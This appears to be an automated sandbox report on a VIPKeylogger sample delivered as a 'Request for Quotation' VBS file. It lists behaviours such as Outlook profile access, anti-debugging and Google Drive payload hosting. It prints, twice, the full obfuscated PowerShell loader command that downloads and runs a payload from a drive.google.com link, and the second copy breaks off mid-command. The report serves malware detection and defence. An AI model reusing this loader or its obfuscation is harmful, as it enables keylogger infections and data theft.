Analysis Overview
SHA256
0bdcef1bfa0aaab36d678b6615963b6a1f536cfb2216c6d76186476375c05e8c
Threat Level: Known bad
The file 0bdcef1bfa0aaab36d678b6615963b6a1f536cfb2216c6d76186476375c05e8c was found to be: Known bad.
Malicious Activity Summary
Vipkeylogger family
VIPKeylogger
Blocklisted process makes network request
Checks computer location settings
Looks up external IP address via web service
Accesses Microsoft Outlook profiles
Command and Scripting Interpreter: PowerShell
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of NtCreateThreadExHideFromDebugger
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Browser Information Discovery
Suspicious behavior: EnumeratesProcesses
outlook_office_path
outlook_win_path
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-04 05:40
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-04 05:40
Reported
2024-11-04 05:43
Platform
win7-20241010-en
Max time kernel
150s
Max time network
19s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 108 wrote to memory of 2896 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 108 wrote to memory of 2896 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 108 wrote to memory of 2896 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request for Quotation_MYMRT.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Overjealously Henblikkets Prearrangement Tidmangelen #>;$kookeree='Desensitize';<#Umisforstaaeligheds Kludged Edingtonite Funktionskort #>; function Unclogs($Ruskregne){If ($host.DebuggerEnabled) {$Approximatenfold++;}$voice=$Flittiglisernes+$Ruskregne.'Length' - $Approximatenfold; for ( $Approximate=5;$Approximate -lt $voice;$Approximate+=6){$Benedicerendes=$Approximate;$Hittite44+=$Ruskregne[$Approximate];}$Hittite44;}function Stormagtskonflikten($Bolstederne){ .($Popsanger) ($Bolstederne);}$Domesticeringernes=Unclogs ' ,dskMFatheoSpritzResoriHalfwlStavelAnem aMult./S rud ';$Gttevrkets=Unclogs 'U sagTKeratlDoce scale 1Rntge2hilbo ';$Kalaset='O,cip[MelleNSpidsEjellyt Cont. Lgstsarb,jE V inrDubitVPhil,IBacchcF turET matPTestaoEpiphiSch,dNBostyTwhipsMsteapACephanPoseraDulc GVarifePsychrCheva]no el:outsm: MdeasKasseeBetr.cRed.cuCapitr EneriMik,oTEkspoYSvovlPTemper SansoSu.faT Kne OEsc iC H deo scutlDecim=,elon$Blythg NatstS verTOmkrsEBiosyvBac frno arkPurliEOph,lTledelsBookn ';$Domesticeringernes+=Unclogs 'Grade5Subma. Divi0Frdig Slidd(For,eWForfliC.urnnPartidArgumoUdkrewRu,insBasia NeddmN.hickTfluid kramm1Overf0Philo. Frai0Stude;Hauss .ikarW tymi ChrinRaadv6Eunuc4Bulim; cod. HypopxFinan6Overm4Sort.; Besh G.thrLactevArkit:T.ipo1Longi3 Obs,1Nonva.Stalw0 Proc) Le n NonprGHistoe Di pcBrandkCrescoSubat/Pol r2 Thre0Sixer1Firef0Hepto0For.k1 b il0Jaghi1Bibli GwineFTyvstiUntu.r ContePelobf I teoSavlexPeddi/ awn1Dukke3 Befr1Morti.S ing0Azotu ';$Skolemnds=Unclogs 'M crouPrio SGytasEFo ieRPro i-UforgaDcth GGaardE Eft,nAfghaTPosse ';$Balletdanseren=Unclogs 'Rrfl h ,ivitM.noctIndbapLan is,onis:purve/Idiod/Unde,d HvesrElektidiss v ResteTr,gl. Su cgUnaddoInt.roregulg KalilCityte Tame.Fis,ecEraseoakrosm B,dr/ bankuQuatecExurb? romaeMun,mx FolkpOutjuoIronhrBarogtAjo.r=Freied AwayoStartwDupernOntogl StraoOpsiga Sancd Rise& Pha.i Mor d sra=Fulds1 KrobFDrmmeitopfoselain2F,rgim ssasc Curp5GenneDRentehMar pl SkrilfacunXunwa wKalunQ ToroKTypo,s scorURes,wYEcb,ltOmplaP LivsY ,istbHydroq TeksnRgerlEgooro_.rkitn Beg,2 ServxHypohXEj ct9 ,estPApote ';$Adead=Unclogs 'Sweaz>Abrup ';$Popsanger=Unclogs 'YdelsIPolypESkiffXRclam ';$Bregnerdderne238='Prveballons229';$Riverwise='\precompelling.Wit';Stormagtskonflikten (Unclogs 'Zooli$ TestG Irr.L.ntieo tupebNi,roA brndLCerio:FryseuLaa.tNI dbia FlyvtP osetKommuEAer fnArchau HaplALinjeT VulgeJ,rdldObtru=Hacie$ProbleApathNTre lVSeign:CreneAThixlPUdsulPAppendRetn AHirplTImpasADovek+T ven$ScoutRAspa i.ninnVScenaeSoelvrpagenw nsuiIMooras HeltEDecar ');Stormagtskonflikten (Unclogs ' G wd$ Yoemg Sab l lokpoBit ebDatarADhalsLMulti:NondeADosisfSpillbCondyaalfedRHeltakFriseEEriabDO.ontEBroho=Sikk $End.cBIlliqA DbesL icrolRetsiEMaal.tSqua dMilieaSam en fnyssAnlacEDimwirPara.EunshrN Nabo.Dec mSAntipPAlkohlSkabaIInarcTAut n( Diss$ThromAHeapeDWanteeS.rabaRectod A ar)Fngse ');Stormagtskonflikten (Unclogs $Kalaset);$Balletdanseren=$Afbarkede[0];$Pseudoprophetic=(Unclogs 'Coeva$SydligStraiLLanciO BlambankarAun.erl Ruf.:Sa ttf.aemorOrigiAAr,anTMilzbR OuttILaypecChe oE Blo,l .linlNskedIFir b= MatzNMa ieEBerbeWForud-En ocoRefraBNewtsJin.elEPinloCSekstT N.ns Sel rsSnarey Melos ShibtEliz eRedesMTaple.CrystNAlte eStag TDisso.LobelWTrje.eVaarebKanticArbejlGyngeiLighte rub.n Pr.ftGru d ');Stormagtskonflikten ($Pseudoprophetic);Stormagtskonflikten (Unclogs 'Bagfl$SnkelFKaukarEpidiaSpalat ynkrMimediTartrcIllureAsi.hlFaultlRese iForkt.AmoraH .ndieAbsina LestdBiaseeFaderr .edisI.dgr[Hegni$BoolsS.nletk AfproBillelSkylleNominmIntranDrueadBugvgsUmb s]Caskt=Fonot$MnstrDPiet oVandrmOrkese f,rss Sodet rippiUncomcPotfue varsrWardriSelvfnG ynhg Garve des rStraan nadjeOpmars esin ');$Kraplak=Unclogs 'Indkr$GjedoF.ismurThoraaSerfdtSessirForboiIndtac nedbePlo tlV derlCoanniStuvn.Fngs,DSaluboGe erwdisfanOpverlRipenoslee a MicrdAp erFZ.gonireboilFo eseBelre(udsa $ DelvBrefleaPurublKonfolFremgePrambtHorisdGrunda nhann Ma.tsRhymieFornyr.ortreTortunNeu o,Stem,$bankeM Usaai Tr,akNonocr Bundoconvuf proliFove lH.moem HereesarcenSka.psUnamu)advis ';$Mikrofilmens=$Unattenuated;Stormagtskonflikten (Unclogs 'Nierf$spiraGspayrlSluknOMul tB SnorADagsal Angu: ProtSAd okvIndusIUtopiNBit ee egnesUn.tiT ichIRappoereconRPol g=kon e(DensaTAdduceBahanSKlkniTSprog-TjrehP tora.lueftEndeghAntip ,oret$CoracMst vaiPostmKv ldlRImpeto GideF ,erriPersoLOprrsm CresEIn,ekNen lesCourt) tild ');while (!$Svinestier) {Stormagtskonflikten (Unclogs 'Ursic$ GammgFiftyl Re do elfabNonnoaGermal Pros:Ma.kiRkonsteS lsogHalvfoRenrirUsknngImpe e iewpdUnder=Rudol$KalmytlystfrBorogubere.eMac o ') ;Stormagtskonflikten $Kraplak;Stormagtskonflikten (Unclogs 'FreonS arnsTCzechaEuropROutfiTForep-Grundshok.dLDenitEAblooeMaccaP Ex a ,usin4humin ');Stormagtskonflikten (Unclogs 'Micro$automgSodaklIn,tiO PostBBulltASt knlForso: S.orSA,thoVKilobiSalpeN pfolEOft nSMicr T ekski DomseN,kesrMyxop= Sti (H antTHa meEJa ovs Peept Coff- .ntipSpgelARe naTBr chHOr,de ytho$TygniM S.eei eripKMadeiRpreglo HypeF WatcI Neb LFogedMOrnamEgtternIg,ngsAstig)Debou ') ;Stormagtskonflikten (Unclogs ' Do n$A poiGRu inLBoendOSlskiB Stemasl sklDybs :MajesfForrauSikk LRoll dAgatibDe roEOecisfGysenA A,boR Bl gE ContN LettTHirsc=B yba$ nglugP ytylFord OWrathBTypolA ProslWooll:De asNA.svioBlennn.pholIAnmelNLystpTMollieS imiRRepinpOverloDeducl AnanAKbestt B.adiQuartO AiglNYdels+ arpa+Forfl% Basi$Un laASpn ifJordfBNephraSkattRsporskdoorhEArterDAli ne Octi. GenrCMutatOOmf ruSulevnBotrytK.mme ') ;$Balletdanseren=$Afbarkede[$Fuldbefarent];}$Peroxyl=312718;$Ruskendes254=32260;Stormagtskonflikten (Unclogs ' Cent$BourdgD nnilHundeOFribbbCombiA MiniLEcorc:Ar,hrC HowieLimstn ofretA.staR HedganymphlAnon,B E,vaif lmbB nstilSubliI upploReg ltLea.lE Hebek ThanEE,ecttStykesFolli Komm= Aftr ComptGVu cae TripT bayo-Nse ocretraoBagbun isketUndereBehovnSemifTDisti Ensi$Glas.MUklarISlutsKForanrAstr,OTr prf enhoiMorsiLArkivmPrizeeFootsn SurisKonto ');Stormagtskonflikten (Unclogs 'Stats$FinangCheirl Me co Fredb,arabaDyrkel C lh: A,idENervsf FlavfMiliteBrnehk Obclt Trsku FugleDenimr SpliiKakaonS ibsgKompaeC rrur Over Toil= Krem Ops e[ C anSOffenyAfruns,eignt PiraeAtlasm Raa . isquCGodkeoVejrmn enervUncites,ruerColont ,iks]Troub:Zoili:BichrFMononrSterso M slmuntunBEscheaBrug.sTypoge nva6Fyrre4Lsr.vSsh,pstPlantrCentii Ank n.kramgFordr(sepia$NisnaCDiadeeNummenKickotRecovrWou daSq irltastebCu geiKlippbreincl lamiPohapoFuturt T igeKisbokDeareeVer etLoesssSpott)Limit ');Stormagtskonflikten (Unclogs ' Drmm$GstelG,emogLformtO On.dbAllocaInko lUnder:Zar.bF AartoDithir EskaKBew tANyquiManl sr Sel EN.tli Hudor=Genda Spild[O.dstSsjlssySubliSAttertRegieE Ka sMTrisi. Tarwt.bscaeAdatjX MeriTChrem.MajusE livenPakkeC OpleO B ngdSelvhIN rmaNBar egIm.ib]Annui:Klaus:ChairajerimSSmergcHyperiSgnedIUdbaa. KdkrG BreveReinttant pSMatemT ksperPlagiISem nNV gnrGAirst( rebo$ ZapoEBe aafMa daFStemnEDis gkTilriT tudiU LulleSkaltrDomm.i,ommenGodviGF emve YndeR Un c)F,sto ');Stormagtskonflikten (Unclogs 'Sats $HavagG nmanlSpit,op ilaB TilsAMeasolAnati:,lommTGen ea OggaR,orilA olignBredstJagtrIInsi SlimnotZo,el=For a$StlndFCit ooTrep,RSociakObseraHjre,mKla lRRetroE,arke.Fejltssailou traBhjdedSNett TF,rderge,ati DecanDiskegTjr e(Velou$.unctpSemi E KaolrMockfOPrewexMinigY JungLReimb,Unsta$ hylarPo ssUChainSUnchrkbl,kdeDiagnNExactdCa.loeScunnS Read2Ind.s5Imper4Re ni)C,rat ');Stormagtskonflikten $Tarantist;"
Network
Files
C:\Users\Admin\AppData\Local\Temp\Cab255E.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
memory/2896-20-0x000007FEF68AE000-0x000007FEF68AF000-memory.dmp
memory/2896-21-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp
memory/2896-22-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp
memory/2896-23-0x000000001B360000-0x000000001B642000-memory.dmp
memory/2896-24-0x00000000024E0000-0x00000000024E8000-memory.dmp
memory/2896-25-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp
memory/2896-26-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp
memory/2896-27-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp
memory/2896-28-0x000007FEF68AE000-0x000007FEF68AF000-memory.dmp
memory/2896-29-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp
memory/2896-30-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp
memory/2896-31-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp
memory/2896-32-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-04 05:40
Reported
2024-11-04 05:43
Platform
win10v2004-20241007-en
Max time kernel
147s
Max time network
149s
Command Line
Signatures
VIPKeylogger
Vipkeylogger family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2244 wrote to memory of 3032 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2244 wrote to memory of 3032 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1620 wrote to memory of 1936 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 1620 wrote to memory of 1936 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 1620 wrote to memory of 1936 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 1620 wrote to memory of 1936 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request for Quotation_MYMRT.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Overjealously Henblikkets Prearrangement Tidmangelen #>;$kookeree='Desensitize';<#Umisforstaaeligheds Kludged Edingtonite Funktionskort #>; function Unclogs($Ruskregne){If ($host.DebuggerEnabled) {$Approximatenfold++;}$voice=$Flittiglisernes+$Ruskregne.'Length' - $Approximatenfold; for ( $Approximate=5;$Approximate -lt $voice;$Approximate+=6){$Benedicerendes=$Approximate;$Hittite44+=$Ruskregne[$Approximate];}$Hittite44;}function Stormagtskonflikten($Bolstederne){ .($Popsanger) ($Bolstederne);}$Domesticeringernes=Unclogs ' ,dskMFatheoSpritzResoriHalfwlStavelAnem aMult./S rud ';$Gttevrkets=Unclogs 'U sagTKeratlDoce scale 1Rntge2hilbo ';$Kalaset='O,cip[MelleNSpidsEjellyt Cont. Lgstsarb,jE V inrDubitVPhil,IBacchcF turET matPTestaoEpiphiSch,dNBostyTwhipsMsteapACephanPoseraDulc GVarifePsychrCheva]no el:outsm: MdeasKasseeBetr.cRed.cuCapitr EneriMik,oTEkspoYSvovlPTemper SansoSu.faT Kne OEsc iC H deo scutlDecim=,elon$Blythg NatstS verTOmkrsEBiosyvBac frno arkPurliEOph,lTledelsBookn ';$Domesticeringernes+=Unclogs 'Grade5Subma. Divi0Frdig Slidd(For,eWForfliC.urnnPartidArgumoUdkrewRu,insBasia NeddmN.hickTfluid kramm1Overf0Philo. Frai0Stude;Hauss .ikarW tymi ChrinRaadv6Eunuc4Bulim; cod. HypopxFinan6Overm4Sort.; Besh G.thrLactevArkit:T.ipo1Longi3 Obs,1Nonva.Stalw0 Proc) Le n NonprGHistoe Di pcBrandkCrescoSubat/Pol r2 Thre0Sixer1Firef0Hepto0For.k1 b il0Jaghi1Bibli GwineFTyvstiUntu.r ContePelobf I teoSavlexPeddi/ awn1Dukke3 Befr1Morti.S ing0Azotu ';$Skolemnds=Unclogs 'M crouPrio SGytasEFo ieRPro i-UforgaDcth GGaardE Eft,nAfghaTPosse ';$Balletdanseren=Unclogs 'Rrfl h ,ivitM.noctIndbapLan is,onis:purve/Idiod/Unde,d HvesrElektidiss v ResteTr,gl. Su cgUnaddoInt.roregulg KalilCityte Tame.Fis,ecEraseoakrosm B,dr/ bankuQuatecExurb? romaeMun,mx FolkpOutjuoIronhrBarogtAjo.r=Freied AwayoStartwDupernOntogl StraoOpsiga Sancd Rise& Pha.i Mor d sra=Fulds1 KrobFDrmmeitopfoselain2F,rgim ssasc Curp5GenneDRentehMar pl SkrilfacunXunwa wKalunQ ToroKTypo,s scorURes,wYEcb,ltOmplaP LivsY ,istbHydroq TeksnRgerlEgooro_.rkitn Beg,2 ServxHypohXEj ct9 ,estPApote ';$Adead=Unclogs 'Sweaz>Abrup ';$Popsanger=Unclogs 'YdelsIPolypESkiffXRclam ';$Bregnerdderne238='Prveballons229';$Riverwise='\precompelling.Wit';Stormagtskonflikten (Unclogs 'Zooli$ TestG Irr.L.ntieo tupebNi,roA brndLCerio:FryseuLaa.tNI dbia FlyvtP osetKommuEAer fnArchau HaplALinjeT VulgeJ,rdldObtru=Hacie$ProbleApathNTre lVSeign:CreneAThixlPUdsulPAppendRetn AHirplTImpasADovek+T ven$ScoutRAspa i.ninnVScenaeSoelvrpagenw nsuiIMooras HeltEDecar ');Stormagtskonflikten (Unclogs ' G wd$ Yoemg Sab l lokpoBit ebDatarADhalsLMulti:NondeADosisfSpillbCondyaalfedRHeltakFriseEEriabDO.ontEBroho=Sikk $End.cBIlliqA DbesL icrolRetsiEMaal.tSqua dMilieaSam en fnyssAnlacEDimwirPara.EunshrN Nabo.Dec mSAntipPAlkohlSkabaIInarcTAut n( Diss$ThromAHeapeDWanteeS.rabaRectod A ar)Fngse ');Stormagtskonflikten (Unclogs $Kalaset);$Balletdanseren=$Afbarkede[0];$Pseudoprophetic=(Unclogs 'Coeva$SydligStraiLLanciO BlambankarAun.erl Ruf.:Sa ttf.aemorOrigiAAr,anTMilzbR OuttILaypecChe oE Blo,l .linlNskedIFir b= MatzNMa ieEBerbeWForud-En ocoRefraBNewtsJin.elEPinloCSekstT N.ns Sel rsSnarey Melos ShibtEliz eRedesMTaple.CrystNAlte eStag TDisso.LobelWTrje.eVaarebKanticArbejlGyngeiLighte rub.n Pr.ftGru d ');Stormagtskonflikten ($Pseudoprophetic);Stormagtskonflikten (Unclogs 'Bagfl$SnkelFKaukarEpidiaSpalat ynkrMimediTartrcIllureAsi.hlFaultlRese iForkt.AmoraH .ndieAbsina LestdBiaseeFaderr .edisI.dgr[Hegni$BoolsS.nletk AfproBillelSkylleNominmIntranDrueadBugvgsUmb s]Caskt=Fonot$MnstrDPiet oVandrmOrkese f,rss Sodet rippiUncomcPotfue varsrWardriSelvfnG ynhg Garve des rStraan nadjeOpmars esin ');$Kraplak=Unclogs 'Indkr$GjedoF.ismurThoraaSerfdtSessirForboiIndtac nedbePlo tlV derlCoanniStuvn.Fngs,DSaluboGe erwdisfanOpverlRipenoslee a MicrdAp erFZ.gonireboilFo eseBelre(udsa $ DelvBrefleaPurublKonfolFremgePrambtHorisdGrunda nhann Ma.tsRhymieFornyr.ortreTortunNeu o,Stem,$bankeM Usaai Tr,akNonocr Bundoconvuf proliFove lH.moem HereesarcenSka.psUnamu)advis ';$Mikrofilmens=$Unattenuated;Stormagtskonflikten (Unclogs 'Nierf$spiraGspayrlSluknOMul tB SnorADagsal Angu: ProtSAd okvIndusIUtopiNBit ee egnesUn.tiT ichIRappoereconRPol g=kon e(DensaTAdduceBahanSKlkniTSprog-TjrehP tora.lueftEndeghAntip ,oret$CoracMst vaiPostmKv ldlRImpeto GideF ,erriPersoLOprrsm CresEIn,ekNen lesCourt) tild ');while (!$Svinestier) {Stormagtskonflikten (Unclogs 'Ursic$ GammgFiftyl Re do elfabNonnoaGermal Pros:Ma.kiRkonsteS lsogHalvfoRenrirUsknngImpe e iewpdUnder=Rudol$KalmytlystfrBorogubere.eMac o ') ;Stormagtskonflikten $Kraplak;Stormagtskonflikten (Unclogs 'FreonS arnsTCzechaEuropROutfiTForep-Grundshok.dLDenitEAblooeMaccaP Ex a ,usin4humin ');Stormagtskonflikten (Unclogs 'Micro$automgSodaklIn,tiO PostBBulltASt knlForso: S.orSA,thoVKilobiSalpeN pfolEOft nSMicr T ekski DomseN,kesrMyxop= Sti (H antTHa meEJa ovs Peept Coff- .ntipSpgelARe naTBr chHOr,de ytho$TygniM S.eei eripKMadeiRpreglo HypeF WatcI Neb LFogedMOrnamEgtternIg,ngsAstig)Debou ') ;Stormagtskonflikten (Unclogs ' Do n$A poiGRu inLBoendOSlskiB Stemasl sklDybs :MajesfForrauSikk LRoll dAgatibDe roEOecisfGysenA A,boR Bl gE ContN LettTHirsc=B yba$ nglugP ytylFord OWrathBTypolA ProslWooll:De asNA.svioBlennn.pholIAnmelNLystpTMollieS imiRRepinpOverloDeducl AnanAKbestt B.adiQuartO AiglNYdels+ arpa+Forfl% Basi$Un laASpn ifJordfBNephraSkattRsporskdoorhEArterDAli ne Octi. GenrCMutatOOmf ruSulevnBotrytK.mme ') ;$Balletdanseren=$Afbarkede[$Fuldbefarent];}$Peroxyl=312718;$Ruskendes254=32260;Stormagtskonflikten (Unclogs ' Cent$BourdgD nnilHundeOFribbbCombiA MiniLEcorc:Ar,hrC HowieLimstn ofretA.staR HedganymphlAnon,B E,vaif lmbB nstilSubliI upploReg ltLea.lE Hebek ThanEE,ecttStykesFolli Komm= Aftr ComptGVu cae TripT bayo-Nse ocretraoBagbun isketUndereBehovnSemifTDisti Ensi$Glas.MUklarISlutsKForanrAstr,OTr prf enhoiMorsiLArkivmPrizeeFootsn SurisKonto ');Stormagtskonflikten (Unclogs 'Stats$FinangCheirl Me co Fredb,arabaDyrkel C lh: A,idENervsf FlavfMiliteBrnehk Obclt Trsku FugleDenimr SpliiKakaonS ibsgKompaeC rrur Over Toil= Krem Ops e[ C anSOffenyAfruns,eignt PiraeAtlasm Raa . isquCGodkeoVejrmn enervUncites,ruerColont ,iks]Troub:Zoili:BichrFMononrSterso M slmuntunBEscheaBrug.sTypoge nva6Fyrre4Lsr.vSsh,pstPlantrCentii Ank n.kramgFordr(sepia$NisnaCDiadeeNummenKickotRecovrWou daSq irltastebCu geiKlippbreincl lamiPohapoFuturt T igeKisbokDeareeVer etLoesssSpott)Limit ');Stormagtskonflikten (Unclogs ' Drmm$GstelG,emogLformtO On.dbAllocaInko lUnder:Zar.bF AartoDithir EskaKBew tANyquiManl sr Sel EN.tli Hudor=Genda Spild[O.dstSsjlssySubliSAttertRegieE Ka sMTrisi. Tarwt.bscaeAdatjX MeriTChrem.MajusE livenPakkeC OpleO B ngdSelvhIN rmaNBar egIm.ib]Annui:Klaus:ChairajerimSSmergcHyperiSgnedIUdbaa. KdkrG BreveReinttant pSMatemT ksperPlagiISem nNV gnrGAirst( rebo$ ZapoEBe aafMa daFStemnEDis gkTilriT tudiU LulleSkaltrDomm.i,ommenGodviGF emve YndeR Un c)F,sto ');Stormagtskonflikten (Unclogs 'Sats $HavagG nmanlSpit,op ilaB TilsAMeasolAnati:,lommTGen ea OggaR,orilA olignBredstJagtrIInsi SlimnotZo,el=For a$StlndFCit ooTrep,RSociakObseraHjre,mKla lRRetroE,arke.Fejltssailou traBhjdedSNett TF,rderge,ati DecanDiskegTjr e(Velou$.unctpSemi E KaolrMockfOPrewexMinigY JungLReimb,Unsta$ hylarPo 